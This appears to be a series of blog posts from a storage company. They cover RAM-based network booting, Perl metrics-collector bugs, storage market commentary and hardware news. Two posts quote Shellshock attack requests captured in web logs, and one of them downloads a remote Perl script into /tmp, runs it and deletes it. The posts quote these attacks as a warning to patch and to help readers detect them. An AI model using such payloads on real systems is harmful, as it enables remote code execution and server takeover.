… and the shell shock attempts continue …

From 174.143.168.121 (174-143-168-121.static.cloud-ips.com)

Request: '() { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache"'
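If you want to see whether your own servers are being probed, a quick grep of the web server logs for the tell-tale '() {' function-definition prefix will turn these up (the log path is an assumption; adjust for your layout):

grep -h '() {' /var/log/apache2/access*.log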


Updated boot tech in Scalable OS (SIOS)

This has been an itch we’ve been working on scratching a few different ways, and it’s very much related to forgoing distro-based installers.

Ok, first the back story.

One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if it’s RAIDed in hardware/software. It’s a pathway that can fail. And when it fails, all hell breaks loose.

This has troubled me for many years, and it is why tiburon, now SIOS, is the technology we’ve developed to solve this problem.

It turns out when you solve this problem you solve many others sort of automatically. But you also create a few.

What matters is the balance: which set of problems you want, and how you solve them.

For a long time, we’ve been using NFS-based OS management in the Unison storage system, as well as in our FastPath big data appliances. This makes creating new appliances as simple as installing and booting the hardware or VM. In fact, we’ve done quite a bit of debugging of odd software stacks for customers in VMs like this.

But the NFS model presupposes a fully operational NFS server available at all times. This is doable with a fail-over model, though it leaves a potential single point of failure if not implemented as an HA NFS service.

The model we’ve been working towards for a long time is a complete, correctly functioning appliance OS that runs entirely out of RAM: PXE boot the kernel/initrd, then optionally grab a full OS image.

We want to specify the OS on the PXE command line; SIOS, aka tiburon, provides a database-backed mechanism for configuration, presented as a trivial web-based API. We want all the parts of this served over PXE and http.
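As a rough sketch of what that looks like on the PXE side (assuming a stock pxelinux setup; the kernel/initrd names here are made up, and the append line simply mirrors the command line shown below):

DEFAULT sios
LABEL sios
  KERNEL vmlinuz-sios
  INITRD initrd-sios.img
  APPEND root=ram rw rootfstype=ramdisk console=tty0 console=ttyS1,115200n8 ip=::::diskless:eth0:dhcp ipv6.disable=1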

Well, we made a major step towards the full version of this last week.

root@unison:~# cat /proc/cmdline 
root=ram BOOT_DEBUG=2 rw debug verbose console=tty0 console=ttyS1,115200n8 ip=::::diskless:eth0:dhcp ipv6.disable=1 debug rootfstype=ramdisk verbose

root@unison:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
rootfs          8.0G  2.5G  5.6G  31% /
udev             10M     0   10M   0% /dev
tmpfs            16M  360K   16M   3% /run
tmpfs           8.0G  2.5G  5.6G  31% /
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs            19G     0   19G   0% /run/shm
tmpfs           4.0G     0  4.0G   0% /tmp
tmpfs           4.0G     0  4.0G   0% /var/tmp
tmpfs            16K  4.0K   12K  25% /var/lib/nfs
tmpfs           1.0M     0  1.0M   0% /data

Notice what is completely missing from the kernel boot command line. Hint: there is no root= pointing at a physical disk or an NFS server. Hell, I could even get rid of the ip=:::: bit.

The rootfstype=ramdisk currently uses a hardwired snapshot of a pre-installed file system. But the way we have this written, we can fetch a specific image by adding in something akin to


rootimage=$URL

for appropriate values of $URL. The $URL can point over the high performance network, so grabbing, say, a 1GB image over a 10GbE or IB network should be pretty quick.
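Inside the initramfs, the fetch-and-unpack step boils down to something like the sketch below. This is not the actual SIOS init code; the tarball image format, mount point, and fallback path are assumptions.

# pull rootimage= off the kernel command line
for p in $(cat /proc/cmdline); do
    case "$p" in
        rootimage=*) rootimage="${p#rootimage=}" ;;
    esac
done

# stage the OS into a tmpfs root, falling back to the built-in image on any failure
mount -t tmpfs -o size=8g tmpfs /newroot
if [ -n "$rootimage" ] && wget -q -O /tmp/os.tar.gz "$rootimage"; then
    tar -xzf /tmp/os.tar.gz -C /newroot
else
    tar -xzf /embedded/os.tar.gz -C /newroot
fi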

We could do iSCSI, or FCoE, or SRP, or iSER, or … whatever we want if we want to attach an external block device, though given our concern with the extended failure domain and failure surface, we’d prefer the ramdisk boot.

We can have the system fall back to the pre-defined OS load if the rootimage fails. The booting itself can be HA.

So we can have a much simpler to set up HA http server handing images and config to nodes, as well as a redundant set of PXE servers … far easier to configure, at far lower cost, and with far greater scalability. This will work beautifully at web scale, as all aspects of the system are fully distributable.

Couple this to our config server and automated post-boot config system, and this becomes quite exciting as a product in and of itself.

More soon, but this is quite exciting!


That may be the fastest I’ve seen an exploit go from “theoretical” to “used”

Found in our web logs this afternoon. This is bash shellshock.

Request: '() {:;}; /bin/ping -c 1 104.131.0.69'

This bad boy came from the University of Oklahoma, IP address 157.142.200.11. The ping address 104.131.0.69 is something called shodan.io.

Patch this one folks. Remote execution badness, and all that goes along with it.
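If you want to check whether a host needs the patch, the widely circulated one-liner test for CVE-2014-6271 does the job; a vulnerable bash prints "vulnerable":

env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'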


Interesting bits around EMC

In the last few days, issues around EMC have become publicly known. EMC is the world’s largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on.

Couple this to a fundamental shift in storage, from arrays to distributed, tightly coupled server storage such as Unison, and you have a problem for their core business. Arrays are a huge revenue and profit generator for EMC, but there is no real growth left in the array business.

Moreover, you have companies like Pure Storage, Tegile, Tintri, Nimble, and a multitude of others all attacking EMC in its core market. Take a shrinking market and add strong competition fighting over it. Of course the competitors will also, eventually, have to deal with the fundamental evolution of the market, but until then, they can simply attack the incumbent.

EMC is being forced into a difficult defensive posture, where the best case is no growth and simply treading water. The downside of losing market share to the upstarts is that EMC will lose revenue and profit faster than the natural shrinkage of the market itself.

This is not to say that storage is a shrinking market; it decidedly is not. It’s that the array portion is in a long-term decline.



This is reflected in some analysis from the folks at Wikibon and others.

Unfortunately, this doesn’t spell good things for traditional array vendors. Like EMC.

This is a classical case where some good creative destruction is needed in the market. EMC would be best to do it to their own products, as Pure et al. will most assuredly do it to them if EMC does not.

This is usually very hard to do in larger companies, as many have entrenched power structures that resist the sort of changes needed.

Hopefully EMC can navigate these waters. Though, as it seems, their discussions with HP have come to a grinding halt. That’s one way to solve the issue: break up the federation, sell off assets, and reorganize and reconfigure the rest.

Should be an exciting time for them. Sadly, not in a good way.


sios-metrics code now on github

See the link for more details. It allows us to gather many metrics and save them nicely in the database. This enables very rapid and simple data collection, even for complex data needs.


Solved the major socket bug … and it was a layer 8 problem

I’d like to offer an excuse. But I can’t. It was one single missing newline.

Just one. Missing. Newline.

I changed my config file to use port 10000. I set up an nc listener on the remote host.

nc -k -l a.b.c.d 10000

Then I invoked the code. And the data showed up.

Without a ()*&*(&%&$%*&(^ newline.

That couldn’t possibly be it. Could it? No. It’s way too freaking simple.

I went so far as to swap in Socket::Class in place of IO::Socket::INET. Ok, admittedly, that was not a hard changeover. Very easy in fact.

But it gave me the same results.

Then I got the idea of putting up the nc listener as above. And no freaking newline.

It couldn’t be that this was the difference … could it?

This is just too bloody simple. Really, no way on earth it could be that. The bug is subtle, damn it, not simple!!!

So, to demonstrate that I am not a blithering moron, I put the newline in the send method.

And it started working.

/sigh

I am a blithering moron.

The other code (accidentally) included a newline in the value. And that’s why it worked. In this one, I happily removed the newline. And then things fell over.

A newline is like a semicolon at the end of a line in a programming language: some APIs require it and assume it. The socket API does not assume it, and will happily send whatever buffer you hand it. This is the correct behavior. The data collector API, however, assumes that received data is terminated by a newline, so it can start its parsing.
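The fix itself is tiny. A minimal sketch of the sending side, assuming an IO::Socket::INET client much like ours (the host, port, and metric string are just the values from this post):

use strict;
use IO::Socket::INET;

my ($host, $port) = ('a.b.c.d', 10000);
my $msg  = 'uptime:104612.03';
my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                 PeerPort => $port,
                                 Proto    => 'tcp')
    or die "connect failed: $!";
$sock->send($msg . "\n");   # the collector parses on newline, so terminate the record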

It’s the details that are killers.

Ok, it works now. On to more parallel monitor debugging, and making sure the data gets into InfluxDB correctly. Once we have this done, a major issue in monitoring/metrics that I’ve been itching to solve correctly is done.

I’ll put the code up for this as well. The monitoring code will work on *nix, MacOSX, and Windows, whether it is running in VMs, containers, or on physical servers. This is why it’s so important for us: we can monitor nearly anything with it.


New monitoring tool, and a very subtle bug

I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today.

The monitoring code talks to a graphite backend. It could talk to statsd, or other things. In this case, we are using the graphite input plugin for InfluxDB. I wanted an insanely simple local data collector, and I want it controllable via a very simple config file. It runs on the client being monitored, and the data is pushed back to the database.

Here is the basic config file layout:

# config-file-type: JSON 1
{
   "global" : {
      "log_to_file" : "1",
      "log_name"    : "/tmp/metrics-$system.log"
   },

   "db" : {
      "host"  : "a.b.c.d",
      "port"  : "2003",
      "proto" : "tcp"
   },

   "metrics" : {
      "uptime" : {
         "command"  : "/home/landman/work/development/gui/plugins/uptime.pl",
         "interval" : 5,
         "timeout"  : 2
      }
   }
}

The database is pointed to by the db section, and the metrics are contained in the data structure as indicated. Command could be a script or a command line. Interval is the time in seconds between runs, and timeout is the maximum length in seconds before a child process is killed (preventing a run-away and accumulation of zombies).

The code reads this config and creates one thread per metric, each of which opens its own connection to the database (yeah, potentially problematic for large numbers of metrics; I’ll address that later). Then it takes the output of the command and does brain dead simple “parsing”.
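In outline, each per-metric thread looks something like the sketch below. This is not the actual sios-metrics code, just the shape of it; the db host/port and the metric definition mirror the config above.

#!/usr/bin/perl
use strict;
use threads;
use IO::Socket::INET;
use IPC::Run qw(run timeout);

sub worker {
    my ($cmd, $interval, $tmout) = @_;
    # each thread gets its own connection to the graphite/InfluxDB listener
    my $sock = IO::Socket::INET->new(PeerAddr => 'a.b.c.d',
                                     PeerPort => 2003,
                                     Proto    => 'tcp')
        or die "db connect failed: $!";
    while (1) {
        my ($out, $err) = ('', '');
        # run the collector, killing it if it runs past its timeout
        eval { run [$cmd], '>', \$out, '2>', \$err, timeout($tmout) };
        # brain dead simple parsing of "name:value"
        if ($out =~ /^(\S+):(\S+)/) {
            $sock->send("$1 $2 " . time() . "\n");   # graphite plaintext line
        }
        sleep($interval);
    }
}

threads->create(\&worker,
                '/home/landman/work/development/gui/plugins/uptime.pl', 5, 2)->detach;
sleep 1 while 1;   # keep the parent alive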

The scripts look like this (they can use any language, we don’t care):

#!/usr/bin/perl
# trivial collector plugin: emit "name:value\n" on stdout
use strict;
my $rc;

# /proc/uptime contains "uptime_seconds idle_seconds"
chomp($rc = `cat /proc/uptime`);
if ($rc =~ /(\d+\.\d+)\s+(\d+\.\d+)/) {
   printf "uptime:%.2f\n",$1;
}

and the data they spit out is very simple as well.

landman@lightning:~/work/development/gui$ plugins/uptime.pl 
uptime:104612.03

Simple future optimizations include launching each collector process once, having it wake up at a configurable interval to return data, and then letting it go back to sleep. Potentially important on busy systems.

The metrics.pl code then pulls this data in, slightly reformats it for graphite, and sends it off.
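For reference, the reformatting is minimal: the graphite/carbon plaintext protocol is just one "metric value timestamp" line per sample, so the "uptime:104612.03" from the plugin goes out as a line like

uptime 104612.03 <epoch_seconds>

with the metric name usually prefixed by the hostname (lightning.uptime and so on) to keep different machines apart.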

It, well, mostly … sort of … worked. I had to fix two bugs. Technically, I didn’t fix the bugs. I worked around them. They were not good bugs, and they are showing me I might need to rethink writing this code in Perl.

The first bug I caught was quite surprising. Using the IPC::Run module, which I’ve used for almost a decade, I create a run harness, and start the code running. Everything executes correctly. Output is generated correctly. Gets pulled into the program.

Notice how I didn’t say “gets pulled into the program correctly”. It took me a while to find this, and I had to resort to “first principles”.

 # I can't find where this bug is, but the last character of mvalue is wrong ...
 @c = split(//, $mvalue);
 pop @c;
 $mvalue = join('', @c);
 # ... so lop it off

For some reason, and I’ve not figured it out, we were getting a carriage return appended to the end of the output. Chomp, the “smart” function that lops off the trailing newline on input lines, was unable to handle this: chomp only removes the input record separator ($/, normally "\n"), so a stray "\r" sails right through.

I only saw it in my debugging output, when output lines were corrupted. Something that should never happen. Did.

Ok. So the code above splits $mvalue into its characters. I included a


$mvalue = join("|",@c);

in the code so I could see what it thought the value should be. And sure enough, that’s how I caught the bug that should not be.

The work around is hackish, but I can live with it until I can figure the rest out.
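For what it’s worth, assuming the stray byte really is a trailing carriage return, a less hackish one-liner would strip it directly:

$mvalue =~ s/\r+$//;   # drop any trailing carriage returns that chomp won't touch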

It’s the next bug that is brutal. I have a workaround. And it’s evil. Which is why I am thinking about rewriting in another language, as this may point to a bug in part of the core functionality. I need this to work quickly, so I’ll use the hack in the near term, but longer term, I need to have something that works and is easy to work with.

I am using IO::Socket::INET to connect a client to a remote socket. I am doing this inside of the threads::shared paradigm in Perl. For a number of reasons, Perl doesn’t have real lightweight threads … well, it does and it doesn’t. Long story, but ithreads plus threads::shared is the best compromise: each thread gets its own cloned interpreter, with explicitly shared data and some “magic”. Sockets generally work well in forked and threaded environments … at least servers do. I am not sure about clients now.

Brain dead simple constructors, nothing odd. Checking return values. All appears to be well.

Then I do a send($msg) and …

… not a bloody thing. It “succeeds” but the data never shows up in the database.

So, here comes the hack. The send($msg) call is logically equivalent to “echo $msg | nc $host $port”, so replace that one line with the send, with this external call. See what happens.

Now data starts showing up.

Of course, the single threaded version of the testing code, where I built the code to do the actual sends, works great. Data shows up.

But not when the identical code (both calling the same methods in the module) is running in the threads::shared environment.

Grrrrr….

I’ll figure it out later. But this is a subtle bug. Very hard to characterize, and then I have to chase it down.


New 8TB and 10TB drives from HGST, fit nicely into Unison

The TL;DR version: Imagine 60x 8TB drives (480TB, about 1/2 PB) in a 4U unit, or 4.8PB in a rack. Now make those 10TB drives: 600TB in 4U, 6PB in a full rack.

These are shingled drives, great for “cold” storage, object storage, etc. One of the many functions that Unison is used for. These aren’t really for standard POSIX file systems, as your read-modify-write length is of the order of a GB or so, on a per drive basis. But absolutely perfect for very large streaming loads. Think virtual tape, or streaming archives. Or streaming objects.

The short version is that we will use them when they make sense for customers’ extremely dense systems. The longer version is that you should be hearing more soon about this.

Just remember, though, that the larger the single storage element, the higher the storage bandwidth wall … the time to read/write the entire element. As a rough example, at around 200 MB/s of sustained sequential bandwidth, reading all of an 8TB drive takes on the order of 11 hours. The higher this wall is, the colder the data is, which for these drives is their design point. But you still need sufficient bandwidth to drive these units, either over 10/40/100 GbE or IB of various flavors.


The Haswells are (officially) out

Great article summarizing information about them here. Of course, everyone and their brother put out press releases indicating that they would be supporting them. Rather than add to that cacophony (ok, just a little: All Scalable Informatics platforms are available with Haswell architecture, more details including benchies … soon …) we figured we’d let it die down, as the meaningful information will come from real user cases.

Haswell is interesting for a number of reasons, not the least of which is 16 DP FLOPs/cycle per core, but fundamentally, it’s a more efficient/faster chip in many regards. The ring architecture may show some interesting artifacts in high memory contention codes, so we might see a number of cases where lower core count (MCC) variants are faster at certain codes than the high core count (HCC) units.

DDR4 is welcome as a change, and the 2133 LRDIMMs should be the DIMM of choice for most use cases.

Haswell should provide a serious uptick to siFlash performance, which is, as we occasionally remind people, the fastest single converged server storage device in the market, and not by a little bit. It will also give DeltaV a serious kick forward. Couple the faster processing with the massive 12g data rail guns we have …

Yeah, this should be an interesting next few months :D


Be sure to vote for your favorites in the HPCWire readers choice awards

Scalable Informatics is nominated in

  1. #12 for Best HPC storage product or technology,
  2. #20 Top supercomputing achievement, which could be for this, this on a single storage box, or this result,
  3. #21 Top 5 new products or technologies to watch, for our Unison,
  4. and #22 for Top 5 vendors to watch.

Our friends at Lucera are nominated for #4, Best use of HPC in financial services.

Please do vote for us and our friends at Lucera!

